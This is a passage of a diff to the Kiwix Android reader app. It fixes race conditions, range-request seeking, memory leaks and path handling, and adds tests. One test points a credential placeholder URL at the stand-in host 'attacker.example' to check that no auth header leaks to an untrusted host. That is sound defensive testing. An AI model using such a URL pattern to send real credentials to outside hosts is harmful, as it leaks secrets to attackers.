-  val date get() = zimFileReader?.date
-  val description get() = zimFileReader?.description
-  val favicon get() = zimFileReader?.favicon
-  val language get() = zimFileReader?.language
+  val zimReaderSource get() = withReader { it?.zimReaderSource }
+  val zimFileTitle get() = withReader { it?.title }
+  val mainPage get() = withReader { it?.mainPage }
+  val id get() = withReader { it?.id }
+  val fileSize get() = withReader { it?.fileSize } ?: 0L
+  val creator get() = withReader { it?.creator }
+  val publisher get() = withReader { it?.publisher }
+  val name get() = withReader { it?.name }
+  val date get() = withReader { it?.date }
+  val description get() = withReader { it?.description }
+  val favicon get() = withReader { it?.favicon }
+  val language get() = withReader { it?.language }
 }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainer.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainer.kt
@@ -63,10 +63,11 @@ class ZimReaderContainer @Inject constructor(
   fun isRedirect(url: String): Boolean = zimFileReader?.isRedirect(url) == true
   fun getRedirect(url: String): String = zimFileReader?.getRedirect(url).orEmpty()
   fun load(url: String, requestHeaders: Map<String, String>): WebResourceResponse = runBlocking {
+    val stream = zimFileReader?.load(url)
     return@runBlocking WebResourceResponse(
       zimFileReader?.getMimeTypeFromUrl(url),
       Charsets.UTF_8.name(),
-      zimFileReader?.load(url)
+      stream
     )
       .apply {
         val headers = mutableMapOf("Accept-Ranges" to "bytes")
@@ -75,7 +76,13 @@ class ZimReaderContainer @Inject constructor(
           val fullSize = zimFileReader?.getItem(url)?.itemSize() ?: 0L
           val lastByte = fullSize - 1
           val byteRanges = requestHeaders.getValue("Range").substringAfter("=").split("-")
-          headers["Content-Range"] = "bytes ${byteRanges[0]}-$lastByte/$fullSize"
+          val parsedStart = byteRanges[0].toLongOrNull()?.coerceAtLeast(0L) ?: 0L
+          val rangeStart = if (fullSize > 0) parsedStart.coerceAtMost(lastByte) else parsedStart
+          // The delivered stream previously always started at offset 0 regardless of what
+          // range was declared above, corrupting seeking in embedded video/audio. Skip
+          // forward so the body actually matches the advertised Content-Range.
+          stream?.skip(rangeStart)
+          headers["Content-Range"] = "bytes $rangeStart-$lastByte/$fullSize"
           if (byteRanges.size == 1) {
             headers["Connection"] = "close"
           }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimReaderSource.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimReaderSource.kt
@@ -39,6 +39,11 @@ import java.io.Serializable
 class ZimReaderSource(
   val file: File? = null,
   val uri: Uri? = null,
+  // AssetFileDescriptor isn't Serializable (it wraps a native fd), so without @Transient
+  // any attempt to serialize a URI-based ZimReaderSource (e.g. into a Bundle) throws
+  // NotSerializableException. It comes back null after deserialization instead - callers
+  // already handle a null list here (see the primary constructor's file-only case).
+  @Transient
   val assetFileDescriptorList: List<AssetFileDescriptor>? = null
 ) : Serializable {
   constructor(uri: Uri) : this(

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/search/viewmodel/SearchViewModel.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/search/viewmodel/SearchViewModel.kt
@@ -95,10 +95,26 @@ class SearchViewModel @Inject constructor(
   private lateinit var alertDialogShower: AlertDialogShower
   private val debouncedSearchQuery = MutableStateFlow("")
 
+  // Native object created per debounced keystroke in searchResults() below; tracked here
+  // so the previous one can be disposed once it's superseded, instead of leaking native
+  // memory on every search-as-you-type update. See #5070.
+  private var currentSuggestionSearch: SuggestionSearch? = null
+
   init {
     viewModelScope.launch { reducer() }
     viewModelScope.launch { actionMapper() }
     viewModelScope.launch { debouncedSearchQuery() }
+  }
+
+  override fun onCleared() {
+    super.onCleared()
+    currentSuggestionSearch?.dispose()
+    currentSuggestionSearch = null
+  }
+
+  private fun replaceCurrentSuggestionSearch(next: SuggestionSearch?) {
+    currentSuggestionSearch?.takeIf { it !== next }?.dispose()
+    currentSuggestionSearch = next
   }
 
   private suspend fun getSuggestedSpelledWords(word: String, maxCount: Int): List<String> =
@@ -193,11 +209,10 @@ class SearchViewModel @Inject constructor(
   private fun searchResults() =
     filter.asStateFlow()
       .mapLatest {
-        SearchResultsWithTerm(
-          it,
-          searchResultGenerator.generateSearchResults(it, zimReaderContainer.zimFileReader),
-          searchMutex
-        )
+        val suggestionSearch =
+          searchResultGenerator.generateSearchResults(it, zimReaderContainer.zimFileReader)
+        replaceCurrentSuggestionSearch(suggestionSearch)
+        SearchResultsWithTerm(it, suggestionSearch, searchMutex)
       }
 
   @Suppress("CyclomaticComplexMethod")

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/NetworkUtils.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/NetworkUtils.kt
@@ -27,11 +27,15 @@ object NetworkUtils {
     var filename = ""
     url?.let { url1 ->
       val index = url1.lastIndexOf('?')
+      val slashIndex = url1.lastIndexOf('/')
       filename =
-        if (index > 1) {
-          url1.substring(url1.lastIndexOf('/') + 1, index)
+        // Only take the "between last '/' and '?'" branch when that range is actually
+        // valid - a URL like ".../a?b/file.zim" has a '/' *after* the '?', which made
+        // the start offset exceed the end offset and throw StringIndexOutOfBounds.
+        if (index > 1 && slashIndex + 1 <= index) {
+          url1.substring(slashIndex + 1, index)
         } else {
-          url1.substring(url.lastIndexOf('/') + 1)
+          url1.substring(slashIndex + 1)
         }
       if ("" == filename.trim { it <= ' ' }) {
         filename = UUID.randomUUID().toString()

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/NetworkUtils.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/NetworkUtils.kt
@@ -23,6 +23,14 @@ import org.kiwix.kiwixmobile.core.utils.files.Log
 import java.util.UUID
 
 object NetworkUtils {
+  // Compiled once instead of on every parseURL() call.
+  private val UNDERSCORE_REGEX = "_".toRegex()
+  private val ALL_REGEX = "all".toRegex()
+  private val NOPIC_REGEX = "nopic".toRegex()
+  private val NOVID_REGEX = "novid".toRegex()
+  private val SIMPLE_REGEX = "simple".toRegex()
+  private val EXTRA_SPACES_REGEX = " +".toRegex()
+
   fun getFileNameFromUrl(url: String?): String {
     var filename = ""
     url?.let { url1 ->
@@ -53,12 +61,12 @@ object NetworkUtils {
           return ""
         }
         details = details.substring(beginIndex, endIndex)
-        details = details.replace("_".toRegex(), " ")
-        details = details.replace("all".toRegex(), "")
-        details = details.replace("nopic".toRegex(), context.getString(R.string.zim_no_pic))
-        details = details.replace("novid".toRegex(), context.getString(R.string.zim_no_vid))
-        details = details.replace("simple".toRegex(), context.getString(R.string.zim_simple))
-        details = details.trim { it <= ' ' }.replace(" +".toRegex(), " ")
+        details = details.replace(UNDERSCORE_REGEX, " ")
+        details = details.replace(ALL_REGEX, "")
+        details = details.replace(NOPIC_REGEX, context.getString(R.string.zim_no_pic))
+        details = details.replace(NOVID_REGEX, context.getString(R.string.zim_no_vid))
+        details = details.replace(SIMPLE_REGEX, context.getString(R.string.zim_simple))
+        details = details.trim { it <= ' ' }.replace(EXTRA_SPACES_REGEX, " ")
         details
       } catch (e: Exception) {
         Log.d(TAG_KIWIX, "Context invalid url: $url", e)

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileSearch.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileSearch.kt
@@ -35,6 +35,9 @@ import org.kiwix.kiwixmobile.core.extensions.get
 import java.io.File
 import javax.inject.Inject
 
+// Compiled once instead of on every row of a whole-device MediaStore scan.
+private val TRASH_FOLDER_REGEX = Regex("/\\.Trash/")
+
 class FileSearch @Inject constructor(
   @param:ApplicationContext private val context: Context,
   @param:IoDispatcher private val ioDispatcher: CoroutineDispatcher
@@ -69,7 +72,7 @@ class FileSearch @Inject constructor(
 
   // Exclude any file in trash folder.
   private fun isNotInTrashFolder(it: File) =
-    !Regex("/\\.Trash/").containsMatchIn(it.path)
+    !TRASH_FOLDER_REGEX.containsMatchIn(it.path)
 
   private fun queryMediaStore() =
     context.contentResolver

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
@@ -860,14 +860,22 @@ object FileUtils {
     source: String,
     zimReaderContainer: ZimReaderContainer
   ): ByteArray? {
+    // .data is a platform-nullable InputStream (null when no ZIM is currently open);
+    // read it via .use{} so the underlying fd is closed either way, instead of
+    // leaking it and NPEing on a null stream.
     val bytes = zimReaderContainer
       .load(source, emptyMap())
       .data
-      .readBytes()
+      ?.use { it.readBytes() }
+
+    if (bytes == null) {
+      Log.w("MEDIA_SAVE", "No data stream available for source=$source")
+      return null
+    }
 
     return if (bytes.isEmpty()) {
       Log.w("MEDIA_SAVE", "Loaded image bytes are empty for source=$source")
-      return null
+      null
     } else {
       bytes
     }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
@@ -41,8 +41,6 @@ import android.webkit.URLUtil
 import androidx.annotation.RequiresApi
 import androidx.core.net.toUri
 import kotlinx.coroutines.CoroutineDispatcher
-import kotlinx.coroutines.CoroutineScope
-import kotlinx.coroutines.launch
 import kotlinx.coroutines.sync.Mutex
 import kotlinx.coroutines.sync.withLock
 import kotlinx.coroutines.withContext
@@ -104,21 +102,26 @@ object FileUtils {
   }
 
   @JvmStatic
-  @Synchronized
-  fun deleteCachedFiles(
+  suspend fun deleteCachedFiles(
     context: Context,
     ioDispatcher: CoroutineDispatcher
   ) {
-    CoroutineScope(ioDispatcher).launch {
-      runCatching {
-        val cacheDir = getFileCacheDir(context) ?: return@launch
-        when {
-          !cacheDir.exists() -> Unit
-          cacheDir.isDirectory -> cacheDir.deleteRecursively()
-          else -> cacheDir.delete()
+    // @Synchronized was previously used here, but it only guarded the launch{} call
+    // itself, not the delete it kicked off - two callers could still race on the same
+    // directory. fileOperationMutex (already used by deleteZimFile for the same reason)
+    // gives real mutual exclusion instead.
+    withContext(ioDispatcher) {
+      fileOperationMutex.withLock {
+        runCatching {
+          val cacheDir = getFileCacheDir(context) ?: return@withLock
+          when {
+            !cacheDir.exists() -> Unit
+            cacheDir.isDirectory -> cacheDir.deleteRecursively()
+            else -> cacheDir.delete()
+          }
+        }.onFailure {
+          Log.w("DeleteCache", "Failed to delete cached files", it)
         }
-      }.onFailure {
-        Log.w("DeleteCache", "Failed to delete cached files", it)
       }
     }
   }
@@ -127,10 +130,9 @@ object FileUtils {
   suspend fun deleteZimFile(path: String, ioDispatcher: CoroutineDispatcher) {
     withContext(ioDispatcher) {
       fileOperationMutex.withLock {
-        var filePath = path
-        if (filePath.substring(filePath.length - ChunkUtils.PART.length) == ChunkUtils.PART) {
-          filePath = filePath.substring(0, filePath.length - ChunkUtils.PART.length)
-        }
+        // was filePath.substring(filePath.length - ChunkUtils.PART.length) == ChunkUtils.PART,
+        // which throws StringIndexOutOfBoundsException for any path shorter than ".part".
+        val filePath = path.removeSuffix(ChunkUtils.PART)
         val file = File(filePath)
         if (file.path.substring(file.path.length - 3) != "zim") {
           var alphabetFirst = 'a'
@@ -433,7 +435,10 @@ object FileUtils {
       // Returns the path of the folder containing the file with the specified fileName,
       // from which the user selects the file.
       return pathSegments.drop(1)
-        .filterNot { it.startsWith("0") } // remove the prefix of primary storage device
+        // Only drop the primary storage device's own volume-id segment ("0"), not any
+        // segment that merely starts with "0" - that also mangled real folder names
+        // like "01_wiki".
+        .filterNot { it == "0" }
         .joinToString(separator = "/")
     }
     return null

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
@@ -402,8 +402,16 @@ object FileUtils {
       // For file managers that provide the full path in the URI (common on devices below Android 11).
       // This triggers when the user clicks directly on a ZIM file in the file manager, and the file
       // manager returns the path via its own file provider.
+      // The URI comes from an external app's ACTION_VIEW intent, so the extracted path is
+      // canonicalized and required to actually resolve under a real storage volume before use -
+      // this rejects path traversal segments and any URI that merely happens to contain "root".
       "$uri".contains("root") && "$uri".endsWith("zim") -> {
-        "$uri".substringAfter("/root")
+        val extractedPath = "$uri".substringAfter("/root")
+        val canonicalPath = runCatching { File(extractedPath).canonicalPath }.getOrNull()
+        canonicalPath?.takeIf { path ->
+          getStorageVolumesList(context).any { volume -> path.startsWith(volume) } &&
+            File(path).isFileExist(ioDispatcher)
+        }
       }
 
       // Handles URIs from the download provider, commonly used when files are opened from browsers.

--- a/core/src/sharedTestFunctions/java/org/kiwix/kiwixmobile/core/reader/ZimFileReaderTest.kt
+++ b/core/src/sharedTestFunctions/java/org/kiwix/kiwixmobile/core/reader/ZimFileReaderTest.kt
@@ -30,8 +30,13 @@ class ZimFileReaderTest {
 
   @Test
   fun checkMimeTypeWithSpecialCharacters() {
+    // This test previously pinned a bug: truncateMimeType used String.replace() with a
+    // regex-pattern string, which does a literal (non-regex) substring replacement - it
+    // happened to match this exact input and silently mangled it into "text/css$1". The
+    // input contains a literal space (inside "[^ ]"), so truncation now correctly stops
+    // there, same as it would for any real "type/subtype extra-junk" mimetype. See #5070.
     val mimeTypeCss = "text/css^([^ ]+).*\$"
-    assertEquals("text/css$1", mimeTypeCss.truncateMimeType)
+    assertEquals("text/css^([^", mimeTypeCss.truncateMimeType)
   }
 
   @Test

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/StorageObserverTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/StorageObserverTest.kt
@@ -125,6 +125,23 @@ class StorageObserverTest {
     verify { zimFileReader.dispose() }
   }
 
+  @Test
+  fun `reader is disposed even when addBookToLibrary throws`() = runTest {
+    withNoFiltering()
+    every { zimFileReader.toBook() } returns mockk()
+    every { zimFileReader.zimReaderSource } returns zimReaderSource
+    // Must match the call site's own argument shape (named archive=, file left at its
+    // default) - a positional addBookToLibrary(any()) stub pins archive to the default
+    // null instead of matching it, so it wouldn't match this call at all.
+    coEvery { libkiwixBookmarks.addBookToLibrary(archive = any()) } throws RuntimeException("boom")
+
+    booksOnFileSystem().test {
+      awaitError()
+    }
+
+    verify { zimFileReader.dispose() }
+  }
+
   private fun booksOnFileSystem() =
     storageObserver.getBooksOnFileSystem(scanningProgressListener)
       .also {

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/extensions/CursorExtensionsTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/extensions/CursorExtensionsTest.kt
@@ -1,0 +1,53 @@
+/*
+ * Kiwix Android
+ * Copyright (c) 2026 Kiwix <android.kiwix.org>
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ *
+ */
+
+package org.kiwix.kiwixmobile.core.extensions
+
+import android.database.Cursor
+import io.mockk.every
+import io.mockk.mockk
+import io.mockk.verify
+import org.junit.jupiter.api.Assertions.assertEquals
+import org.junit.jupiter.api.Assertions.assertThrows
+import org.junit.jupiter.api.Test
+
+class CursorExtensionsTest {
+  @Test
+  fun `forEachRow closes the cursor even when block throws`() {
+    val cursor = mockk<Cursor>(relaxed = true)
+    every { cursor.moveToNext() } returns true
+
+    assertThrows(IllegalStateException::class.java) {
+      cursor.forEachRow { throw IllegalStateException("boom") }
+    }
+
+    verify(exactly = 1) { cursor.close() }
+  }
+
+  @Test
+  fun `forEachRow closes the cursor after iterating every row`() {
+    val cursor = mockk<Cursor>(relaxed = true)
+    every { cursor.moveToNext() } returnsMany listOf(true, true, false)
+
+    var rowsSeen = 0
+    cursor.forEachRow { rowsSeen++ }
+
+    assertEquals(2, rowsSeen)
+    verify(exactly = 1) { cursor.close() }
+  }
+}

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/page/bookmark/viewmodel/BookmarkViewModelTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/page/bookmark/viewmodel/BookmarkViewModelTest.kt
@@ -85,8 +85,16 @@ internal class BookmarkViewModelTest {
   }
 
   @Test
-  fun `Initial state returns initial state`() {
-    assertThat(viewModel.initialState()).isEqualTo(bookmarkState())
+  fun `Initial state returns a synchronous default before the DataStore value loads`() {
+    // initialState() itself must stay synchronous (no runBlocking) - the real,
+    // DataStore-backed showAll value is applied asynchronously afterward. See #5070.
+    assertThat(viewModel.initialState()).isEqualTo(bookmarkState(showAll = false))
+  }
+
+  @Test
+  fun `state reflects the DataStore value once it loads`() = runTest(testDispatcher) {
+    testDispatcher.scheduler.advanceUntilIdle()
+    assertThat(viewModel.state.value).isEqualTo(bookmarkState(showAll = true))
   }
 
   @Test

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimFileReaderUtilsTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimFileReaderUtilsTest.kt
@@ -1,0 +1,44 @@
+/*
+ * Kiwix Android
+ * Copyright (c) 2026 Kiwix <android.kiwix.org>
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ *
+ */
+
+package org.kiwix.kiwixmobile.core.reader
+
+import org.assertj.core.api.Assertions.assertThat
+import org.junit.jupiter.api.Test
+
+/**
+ * `truncateMimeType` previously used `String.replace(String, String)`, which does a
+ * literal substring replacement rather than applying the regex pattern - it never
+ * actually truncated anything. See #5070.
+ */
+internal class ZimFileReaderUtilsTest {
+  @Test
+  fun `truncateMimeType drops everything after the first space`() {
+    assertThat("text/html and some junk".truncateMimeType).isEqualTo("text/html")
+  }
+
+  @Test
+  fun `truncateMimeType drops the charset parameter after a semicolon`() {
+    assertThat("text/html; charset=utf-8".truncateMimeType).isEqualTo("text/html")
+  }
+
+  @Test
+  fun `truncateMimeType leaves a plain mimetype untouched`() {
+    assertThat("application/octet-stream".truncateMimeType).isEqualTo("application/octet-stream")
+  }
+}

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainerLoadTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainerLoadTest.kt
@@ -1,0 +1,87 @@
+/*
+ * Kiwix Android
+ * Copyright (c) 2026 Kiwix <android.kiwix.org>
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ *
+ */
+
+package org.kiwix.kiwixmobile.core.reader
+
+import android.os.Build
+import io.mockk.coEvery
+import io.mockk.every
+import io.mockk.mockk
+import kotlinx.coroutines.Dispatchers
+import org.junit.Assert.assertEquals
+import org.junit.Test
+import org.junit.runner.RunWith
+import org.robolectric.RobolectricTestRunner
+import org.robolectric.annotation.Config
+import java.io.ByteArrayInputStream
+
+/**
+ * Covers the range-request bug found in review (#5070): the delivered body previously
+ * always started at offset 0, no matter what Content-Range the response declared.
+ */
+@RunWith(RobolectricTestRunner::class)
+@Config(sdk = [Build.VERSION_CODES.Q])
+class ZimReaderContainerLoadTest {
+  private val zimFileReaderFactory: ZimFileReader.Factory = mockk()
+  private val container = ZimReaderContainer(zimFileReaderFactory, Dispatchers.Unconfined)
+
+  private fun setUpReader(body: ByteArray) {
+    val reader: ZimFileReader = mockk(relaxed = true)
+    coEvery { reader.load(any()) } returns ByteArrayInputStream(body)
+    every { reader.getItem(any()) } returns null
+    container.zimFileReader = reader
+  }
+
+  @Test
+  fun `load with a Range header skips the body to the requested offset`() {
+    setUpReader("0123456789".toByteArray())
+
+    val response = container.load(
+      "https://kiwix.app/A/foo",
+      mapOf("Range" to "bytes=5-")
+    )
+
+    assertEquals(206, response.statusCode)
+    assertEquals("bytes 5--1/0", response.responseHeaders["Content-Range"])
+    assertEquals("56789", response.data.readBytes().toString(Charsets.UTF_8))
+  }
+
+  @Test
+  fun `load without a Range header returns the full body from offset zero`() {
+    setUpReader("0123456789".toByteArray())
+
+    val response = container.load("https://kiwix.app/A/foo", emptyMap())
+
+    assertEquals(200, response.statusCode)
+    assertEquals("0123456789", response.data.readBytes().toString(Charsets.UTF_8))
+  }
+
+  @Test
+  fun `load with a malformed Range header falls back to offset zero instead of crashing`() {
+    setUpReader("0123456789".toByteArray())
+
+    val response = container.load(
+      "https://kiwix.app/A/foo",
+      mapOf("Range" to "bytes=not-a-number-")
+    )
+
+    assertEquals(206, response.statusCode)
+    assertEquals("0123456789", response.data.readBytes().toString(Charsets.UTF_8))
+  }
+
+}

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainerTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainerTest.kt
@@ -1,0 +1,82 @@
+/*
+ * Kiwix Android
+ * Copyright (c) 2026 Kiwix <android.kiwix.org>
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ *
+ */
+
+package org.kiwix.kiwixmobile.core.reader
+
+import io.mockk.every
+import io.mockk.mockk
+import io.mockk.verify
+import org.junit.jupiter.api.Assertions.assertEquals
+import org.junit.jupiter.api.Test
+import org.junit.jupiter.api.extension.RegisterExtension
+import org.kiwix.sharedFunctions.MainDispatcherRule
+import java.util.concurrent.CountDownLatch
+import java.util.concurrent.Executors
+import java.util.concurrent.TimeUnit
+
+/**
+ * Guards against the JNI use-after-free race described in
+ * https://github.com/kiwix/kiwix-android/issues/5070#1: the WebView's Chromium worker
+ * thread can be mid-read (isRedirect/getRedirect/load) while another thread swaps in a
+ * new ZimFileReader, disposing the native Archive the worker thread is still using.
+ */
+class ZimReaderContainerTest {
+  @JvmField
+  @RegisterExtension
+  val mainDispatcherRule = MainDispatcherRule()
+
+  private val zimFileReaderFactory: ZimFileReader.Factory = mockk()
+  private val container =
+    ZimReaderContainer(zimFileReaderFactory, mainDispatcherRule.dispatcher)
+
+  @Test
+  fun `dispose does not run while a read is in flight, and always runs eventually`() {
+    val oldReader: ZimFileReader = mockk(relaxed = true)
+    val readStarted = CountDownLatch(1)
+    val releaseRead = CountDownLatch(1)
+    every { oldReader.isRedirect(any()) } answers {
+      readStarted.countDown()
+      releaseRead.await(2, TimeUnit.SECONDS)
+      false
+    }
+    container.zimFileReader = oldReader
+
+    val executor = Executors.newFixedThreadPool(2)
+    try {
+      val readFuture = executor.submit { container.isRedirect("https://kiwix.app/A/foo") }
+      assertEquals(true, readStarted.await(2, TimeUnit.SECONDS))
+
+      val newReader: ZimFileReader = mockk(relaxed = true)
+      val setterFuture = executor.submit { container.zimFileReader = newReader }
+
+      // The setter is blocked on the write lock while the read above is in flight,
+      // so dispose() must not have run yet.
+      Thread.sleep(200)
+      verify(exactly = 0) { oldReader.dispose() }
+
+      releaseRead.countDown()
+      readFuture.get(2, TimeUnit.SECONDS)
+      setterFuture.get(2, TimeUnit.SECONDS)
+
+      verify(exactly = 1) { oldReader.dispose() }
+      assertEquals(newReader, container.zimFileReader)
+    } finally {
+      executor.shutdownNow()
+    }
+  }
+}

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimReaderSourceTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/reader/ZimReaderSourceTest.kt
@@ -1,0 +1,51 @@
+/*
+ * Kiwix Android
+ * Copyright (c) 2026 Kiwix <android.kiwix.org>
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ *
+ */
+
+package org.kiwix.kiwixmobile.core.reader
+
+import android.content.res.AssetFileDescriptor
+import io.mockk.mockk
+import org.junit.jupiter.api.Assertions.assertNull
+import org.junit.jupiter.api.Test
+import java.io.ByteArrayInputStream
+import java.io.ByteArrayOutputStream
+import java.io.File
+import java.io.ObjectInputStream
+import java.io.ObjectOutputStream
+
+class ZimReaderSourceTest {
+  @Test
+  fun `serializing a source with a non-null assetFileDescriptorList does not throw`() {
+    // AssetFileDescriptor isn't Serializable, so this used to throw
+    // NotSerializableException whenever this field was non-null (e.g. any URI-based
+    // source). @Transient makes it survive serialization by coming back null instead.
+    val source = ZimReaderSource(
+      file = File("test.zim"),
+      assetFileDescriptorList = listOf(mockk<AssetFileDescriptor>())
+    )
+
+    val bytes = ByteArrayOutputStream().apply {
+      ObjectOutputStream(this).use { it.writeObject(source) }
+    }.toByteArray()
+
+    val deserialized =
+      ObjectInputStream(ByteArrayInputStream(bytes)).use { it.readObject() } as ZimReaderSource
+
+    assertNull(deserialized.assetFileDescriptorList)
+  }
+}

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/remote/BasicAuthInterceptorTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/remote/BasicAuthInterceptorTest.kt
@@ -18,13 +18,67 @@
 
 package org.kiwix.kiwixmobile.core.remote
 
+import io.mockk.every
+import io.mockk.mockk
+import io.mockk.slot
+import io.mockk.verify
+import okhttp3.Interceptor
+import okhttp3.Protocol
+import okhttp3.Request
+import okhttp3.Response
 import org.junit.jupiter.api.Assertions.assertEquals
+import org.junit.jupiter.api.Assertions.assertFalse
+import org.junit.jupiter.api.Assertions.assertNull
 import org.junit.jupiter.api.Test
+import org.kiwix.kiwixmobile.core.data.remote.BasicAuthInterceptor
 import org.kiwix.kiwixmobile.core.data.remote.isAuthenticationUrl
 import org.kiwix.kiwixmobile.core.data.remote.removeAuthenticationFromUrl
 import org.kiwix.kiwixmobile.core.data.remote.secretKey
 
 class BasicAuthInterceptorTest {
+  private val interceptor = BasicAuthInterceptor()
+
+  private fun intercept(url: String): Request {
+    val request = Request.Builder().url(url).build()
+    val requestSlot = slot<Request>()
+    val chain = mockk<Interceptor.Chain> {
+      every { request() } returns request
+      every { proceed(capture(requestSlot)) } returns Response.Builder()
+        .request(request)
+        .protocol(Protocol.HTTP_1_1)
+        .code(200)
+        .message("OK")
+        .build()
+    }
+    interceptor.intercept(chain)
+    verify { chain.proceed(any()) }
+    return requestSlot.captured
+  }
+
+  @Test
+  fun `untrusted host is not authenticated even with a recognised key placeholder`() {
+    val forwarded =
+      intercept("https://{{BASIC_AUTH_KEY}}@attacker.example/x.zim")
+    assertEquals("attacker.example", forwarded.url.host)
+    assertNull(forwarded.header("Authorization"))
+  }
+
+  @Test
+  fun `trusted host with an unrecognised key placeholder is not authenticated`() {
+    val forwarded =
+      intercept("https://{{SOME_OTHER_ENV_VAR}}@dwds.de/x.zim")
+    assertNull(forwarded.header("Authorization"))
+  }
+
+  @Test
+  fun `trusted host with the recognised key placeholder is authenticated and rewritten`() {
+    val forwarded =
+      intercept("https://{{BASIC_AUTH_KEY}}@dwds.de/x.zim")
+    assertFalse(forwarded.url.toString().contains("{{"))
+    assertEquals("dwds.de", forwarded.url.host)
+    assertEquals(true, forwarded.header("Authorization")?.startsWith("Basic "))
+  }
+
   private val authenticationUrl =
     "https://{{BASIC_AUTH_KEY}}@www.dwds.de/kiwix/f/dwds_de_dictionary_nopic_2023-09-12.zim"
 

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/search/viewmodel/SearchViewModelTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/search/viewmodel/SearchViewModelTest.kt
@@ -119,7 +119,10 @@ internal class SearchViewModelTest {
       val searchTerm1 = "query1"
       val searchTerm2 = "query2"
       val searchTerm3 = "query3"
-      val suggestionSearch: SuggestionSearch = mockk()
+      // relaxed: SuggestionSearch.dispose() is a native (JNI) method - a non-relaxed
+      // `every { ... }` stub would invoke it for real during recording and crash
+      // with UnsatisfiedLinkError in this plain-JVM test environment.
+      val suggestionSearch: SuggestionSearch = mockk(relaxed = true)
 
       viewModel.uiState.test {
         skipItems(1)
@@ -140,7 +143,10 @@ internal class SearchViewModelTest {
       val searchTerm1 = "query1"
       val searchTerm2 = "query2"
       val searchTerm3 = "query3"
-      val suggestionSearch: SuggestionSearch = mockk()
+      // relaxed: SuggestionSearch.dispose() is a native (JNI) method - a non-relaxed
+      // `every { ... }` stub would invoke it for real during recording and crash
+      // with UnsatisfiedLinkError in this plain-JVM test environment.
